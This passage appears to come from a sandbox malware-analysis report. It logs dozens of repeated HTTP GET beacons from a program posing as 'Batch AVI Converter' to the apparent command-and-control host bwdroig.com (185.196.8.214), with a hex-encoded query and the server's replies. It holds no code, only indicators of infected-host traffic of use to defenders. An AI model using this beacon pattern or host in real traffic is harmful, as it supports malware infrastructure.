                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:34.016259909 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:34.288535118 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.549733185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:34.411134005 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:35.098615885 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.549734185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:35.223618984 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:35.918203115 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:36.030136108 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:36.274380922 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.549735185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:36.394933939 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:37.246777058 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:37.358622074 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:37.594295979 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:37.702301025 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:37.939866066 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.549736185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:38.068643093 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:38.788089991 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.549737185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:38.912429094 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:39.632658958 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.549738185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:39.757965088 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:40.485228062 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:40.594259024 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:40.839402914 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:40.952760935 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:41.199531078 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:41.313968897 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:41.796288013 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:41.907008886 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:42.152395964 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:42.268094063 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:42.687093019 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:42.796204090 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:43.040795088 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.549739185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:43.161571980 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:43.864748001 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.549740185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:43.990395069 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:44.711309910 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.2.549741185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:44.834280968 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:45.545675993 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:45.657083035 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:45.897728920 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            42192.168.2.549742185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:46.034827948 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:46.723483086 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            43192.168.2.549743185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:46.849680901 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:47.537904024 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            44192.168.2.549744185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:47.663727045 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:48.660645008 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            45192.168.2.549745185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:48.786490917 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:49.481365919 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            46192.168.2.549746185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:49.608409882 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:50.341321945 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:50.453423977 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:50.706715107 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            47192.168.2.549747185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:50.832351923 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:51.549276114 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
